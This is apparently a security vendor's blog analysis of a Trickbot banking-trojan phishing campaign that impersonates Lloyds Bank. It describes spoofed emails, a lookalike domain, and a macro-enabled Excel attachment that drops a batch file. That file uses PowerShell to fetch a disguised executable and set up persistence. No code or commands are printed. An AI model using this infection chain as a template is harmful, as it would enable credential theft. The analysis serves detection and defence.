Cyren : Trickbot Banking Trojan Making Phishing More Real

Trickbot is back, new and improved, and is targeting customers of Lloyds Bank of the UK in a new phishing campaign. The malware deployed uses new techniques to make it even more difficult for the casual user to notice anything unusual when their browser session is hijacked, and their credentials and security codes are being stolen.

Stealing banking credentials using phishing attacks is nothing new, but Trickbot takes this to another level by showing the user the correct URL of the online bank and a legitimate SSL certificate, so the user sees nothing unusual. Most phishing malware pages may have careful design and look like the real deal, but they never have the correct URL. Here, you won't see any difference from your online banking page, because the URL is entirely correct, and therefore also the SSL certificate.

Impersonating Lloyds Bank

A large number of spam e-mails were sent to UK online banking users this week falsely claiming to be from Lloyds Bank. The e-mails that were sent are well-produced HTML emails (example below), with the 'from' field showing as 'Lloyds Bank'. To give a sense of attack volume, in one short 25-minute time window, Cyren saw (and blocked) 75,000 of these emails for its customers.

Picture 1. Spoofed e-mail from Lloyds Bank

While it shows the sender as Lloyds Bank, in this example, if you carefully inspect the sender address you can see that the e-mail is from lloydsbacs.co.uk not lloydsbank.co.uk, a very similar domain which was just created. Most (but not all) of the emails are being sent from a Dutch IP (5.149.255.107), which is a previously known source of spam. This IP seems to host many malicious domains as well as the malicious domain in use here (lloydsbacs.co.uk).

Picture 2. Close-up of address block

Shows Legitimate URL and SSL Certificates

As noted at the beginning, Trickbot takes the phishing of banking credentials to another level by showing the correct URL of the online bank and confirmation of a legitimate SSL certificate, so even more alert users who pay any attention to these sorts of details will not see anything unusual.

Picture 3. lloydsbank.co.uk is displayed to the user

How It Works

The e-mail has an Excel document attached called IncomingBACs.xlsm. After opening the attachment Excel asks the user to enable editing and then to enable macros.

Picture 4. Enable Preview request

Picture 5. 'Enable Content' request for Macro

After pressing the Enable Content button in Excel the macro runs and creates a .bat file in a Temp folder called Vrlhdf.bat and runs it (%APPDATA%/Local/Temp). The bat file opens up PowerShell.exe, which downloads an executable file under the name logo.png, and then stores it at the same place as Qeggfkf.exe. The bat file has two different URL's from which the logo.png file can be downloaded, a redundancy in case one of them is taken down, we presume. After downloading the file, PowerShell runs Qeggfkf.exe.

Picture 6. Vrlhdf.bat

Qeggfkf.exe then creates a copy of itself under AppData/Roaming/winapp/ as Pdffeje.exe, creates an authroot certificate file in %TEMP%, creates a service updated job in the Windows Task folder, and then starts the Pdffeje.exe process and kills the Qeggfkf.exe. Pdffeje.exe is the main TrickBot process.

Picture 7. The folder the Qeggfkf.exe creates

Picture 8. Pdffeje.exe process

Trickbot has an encoded configuration module in the resource section of its binary and is able to receive new modules from a list of controller domains.

Picture 9. The list of controller domains

Cyren detects this version of Trickbot as W32/TrickBot.E.

The sample analyzed was (Pdffeje.exe) md5: f19e7ef1e82daab85cf1f4b23737e914

For an overview on the phishing phenomenon, download Cyren's special threat report on phishing.